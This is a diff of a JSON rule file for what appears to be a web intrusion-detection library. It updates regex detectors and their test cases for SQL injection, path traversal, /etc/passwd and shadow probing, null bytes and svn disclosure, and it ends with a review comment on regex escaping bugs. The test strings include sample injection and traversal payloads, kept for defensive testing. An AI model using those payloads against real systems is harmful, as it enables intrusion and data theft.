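- "java": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
- "ruby": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
- "common": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
+ "title": "Union Attempts",
+ "sophistication": 3,
+ "common": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\")|(?:like\\s*\"%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
  "tests": {
- "shouldFind":["‘union select all 1,2,x,x,x,x —-", "‘union select 1,2,3,x,x,x,x,@@version,x–-","‘union select UTL_INADDR.get_host_address,null,null,null,null from dual–-"],
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
+ "shouldFind": [
+ "'union select all 1,2,x,x,x,x —-",
+ "'union select 1,2,3,x,x,x,x,@@version,x–-",
+ "'union select UTL_INADDR.get_host_address,null,null,null,null from dual–-"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "divide and conquer"
+ ]
  },
  "id": "8"
  },
  {
- "title":"SQL Comment Sequence",
- "sophistication":1,
- "common": "([';]--|--[\\s\\r\\n\\v\\f]|(?:--[^-]*?-)|([^\\-&])#.*?[\\s\\r\\n\\v\\f]|;?\\\\x00)",
+ "title": "SQL Comment Sequence",
+ "sophistication": 1,
+ "common": "([';]--|--[\\s\\r\\n\\v\\f]|(?:'[\\s\\r\\n\\v\\f]*--[^-]*?-)|#[\\s\\r\\n\\v\\f]*$|;?\\\\x00)",
  "tests": {
- "shouldFind":["'--","1=1;\\x00"],
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer"]
+ "shouldFind": [
+ "'--",
+ "1=1;\\x00",
+ "admin\" #"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "-----BEGIN PGP PUBLIC KEY BLOCK-----",
+ "divide and conquer",
+ "Order ID# 2345",
+ "/url/with/#/hash"
+ ]
  },
  "id": "3"
  },
  {
- "title":"Extraction Attempts",
- "sophistication":1,
- "common": "(?:(?:@.+=\\s*?\\(\\s*?select)|(?:\\d+\\s*?(x?or|div|like|between|and)\\s*?\\d+\\s*?[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|x?or|div|like|between|and|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*?(?:drop|alter))|(?:(?:;|#|--)\\s*?(?:update|insert)\\s*?\\w{2,})|(?:[^\\w]SET\\s*?@\\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*?[!=+]+[\\s\\d]*?[\\\"'`\u00b4\u2019\u2018=()]))",
+ "title": "Extraction Attempts",
+ "sophistication": 1,
+ "common": "(?:(?:@.+=\\s*?\\(\\s*?select)|(?:\\d+\\s*?(x?or|div|like|between|and)\\s*?\\d+\\s*?[\\-+])|(?:/\\w+;?\\s+(?:having|and|x?or|div|like|between|and|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*?(?:drop|alter))|(?:(?:;|#|--)\\s*?(?:update|insert)\\s*?\\w{2,})|(?:[^\\w]SET\\s*?@\\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*?[!=+]+[\\s\\d]*?[\"'`\u00b4\u2019\u2018=()]))",
  "tests": {
- "shouldFind":["';Drop table users"],
- "shouldIgnore":["aB--D_C=","union soldier", "select", "James O'Connor", "Like this or that", "divide and conquer", "Sam; James"]
+ "shouldFind": [
+ "';Drop table users"
+ ],
+ "shouldIgnore": [
+ "aB--D_C=",
+ "union soldier",
+ "select",
+ "James O'Connor",
+ "Like this or that",
+ "divide and conquer",
+ "Sam; James"
+ ]
  },
  "id": "4"
  }
  ]
  },
- "fpt":{
- "patterns":[
+ "fpt": {
+ "patterns": [
  {
- "title":"General Traversal",
- "sophistication":2,
- "common": "(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})",
- "ruby": "(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.*))|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})",
- "tests":{
- "shouldFind":["/.../.../.../.../.../","\\0../../../../../../etc/passwd","../../../../../../etc/shadow"],
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
+ "title": "General Traversal",
+ "sophistication": 2,
+ "common": "(?:(?:/|\\\\)?\\.+(/|\\\\)(?:\\.*))|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*/[\\w*-]+/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:/(?:%2e){2})",
+ "tests": {
+ "shouldFind": [
+ "/.../.../.../.../.../",
+ "\\0../../../../../../etc/passwd",
+ "../../../../../../etc/shadow"
+ ],
+ "shouldIgnore": [
+ "Julie",
+ "The quick'o brown... fox.. was. /there"
+ ]
  },
  "id": "1"
  },
  {
- "title":"Common System Probing",
- "sophistication":4,
- "common": "(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)",
- "tests":{
- "shouldFind":["/./././././././././././boot.ini","/home/apache/conf/httpd.conf"],
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
+ "title": "Common System Probing",
+ "sophistication": 4,
+ "common": "(?:%c0%ae/)|(?:(?:/|\\\\)(conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:/|\\\\))|(?:(?:/|\\\\)inetpub|localstart\\.asp|boot\\.ini)",
+ "tests": {
+ "shouldFind": [
+ "/./././././././././././boot.ini",
+ "/home/apache/conf/httpd.conf"
+ ],
+ "shouldIgnore": [
+ "/Home/Index",
+ "Julie",
+ "The quick'o brown... fox.. was. /there"
+ ]
  },
  "id": "2"
  },
  {
- "title":"Attempt for /etc/passwd, shadow",
- "sophistication":1,
- "common": "(?:etc\\/\\W*passwd)|(?:etc\\/\\W*shadow)",
- "tests":{
- "shouldFind":["/etc/passwd"],
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
+ "title": "Attempt for /etc/passwd, shadow",
+ "sophistication": 1,
+ "common": "(?:etc/\\W*passwd)|(?:etc/\\W*shadow)",
+ "tests": {
+ "shouldFind": [
+ "/etc/passwd"
+ ],
+ "shouldIgnore": [
+ "Julie",
+ "The quick'o brown... fox.. was. /there"
+ ]
  },
  "id": "3"
+ },
+ {
+ "title": "Spider svn entries disclosure",
+ "sophistication": 1,
+ "common": ".svn/(./)*entries",
+ "tests": {
+ "shouldFind": [
+ "http://mysite.tld/folder/.svn/entries",
+ "http://mysite.tld/folder/.svn/./entries"
+ ],
+ "shouldIgnore": [
+ "mysite.tld/folder/entries/svn/"
+ ]
+ },
+ "id": "4"
  }
  ]
  },
- "nullbyte":{
- "patterns":[
- {
- "title":"Any Null Byte",
- "sophistication":1,
- "id":"1",
- "common":"\\0",
- "java":"\u0000",
- "tests":{
- "shouldFind":["Duh\u0000","\u0000","\n\rOh\u0000No"],
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
+ "nullbyte": {
+ "patterns": [
+ {
+ "title": "Any Null Byte",
+ "sophistication": 1,
+ "id": "1",
+ "common": "\\x00",
+ "tests": {
+ "shouldFind": [
+ "Duh\u0000",
+ "\u0000",
+ "\n\rOh\u0000No"
+ ],
+ "shouldIgnore": [
+ "Julie",
+ "The quick'o brown... fox.. was. /there"
+ ]
  }
  }
  ]
  },
- "retr":{
- "patterns":[
- {
- "title":"Any Line-Break Character",
- "sophistication":1,
- "id":"1",
- "common":"(\\n|\\r)",
- "tests":{
- "shouldFind":["Duh\r","\r\n","\n\rOh\\0No"],
- "shouldIgnore":["Julie","The quick'o brown... fox.. was. /there"]
+ "retr": {
+ "patterns": [
+ {
+ "title": "Any Line-Break Character",
+ "sophistication": 1,
+ "id": "1",
+ "common": "(\\n|\\r)",
+ "tests": {
+ "shouldFind": [
+ "Duh\r",
+ "\r\n",
+ "\n\rOh\\0No"
+ ],
+ "shouldIgnore": [
+ "Julie",
+ "The quick'o brown... fox.. was. /there"
+ ]
  }
  }
  ]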
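Review bot: The rewritten "Common Command Attempts" rule (cmdi id 2) still ends its pattern with `g(?:\\+\\+|cc\b)`, where the single-backslash `\b` is the JSON escape for backspace (U+0008) rather than a regex word boundary. Assuming the rules are loaded with a standard JSON parser, the `gcc` branch then only matches when a literal backspace follows, so it should read `g(?:\\+\\+|cc\\b)`. None of that rule's `shouldFind` strings exercises this branch; adding one such as `"abc;gcc"` (constructed) would pin the fix. The new "Spider svn entries disclosure" rule, `.svn/(./)*entries`, leaves its dots unescaped so they match any character; `\\.svn/(\\./)*entries` matches what the title describes. The document's closing braces lie outside this hunk.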